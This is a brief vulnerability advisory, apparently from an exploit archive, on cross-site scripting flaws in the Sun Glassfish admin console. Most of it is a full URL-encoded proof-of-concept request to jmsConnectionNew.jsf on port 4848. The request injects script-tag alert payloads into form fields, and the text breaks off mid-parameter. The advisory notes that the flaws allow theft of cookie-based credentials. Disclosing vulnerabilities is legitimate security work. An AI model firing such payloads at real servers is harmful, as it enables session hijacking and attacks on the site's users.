source: https://www.securityfocus.com/bid/29751/info Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3Aproperty ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Agener alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscrip t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType =javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralProperty Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&proper tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true& propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&p ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&prope rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propert yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyFo rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&property Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyFo rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTab le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3 A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Ac ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=pro pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_Focu sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%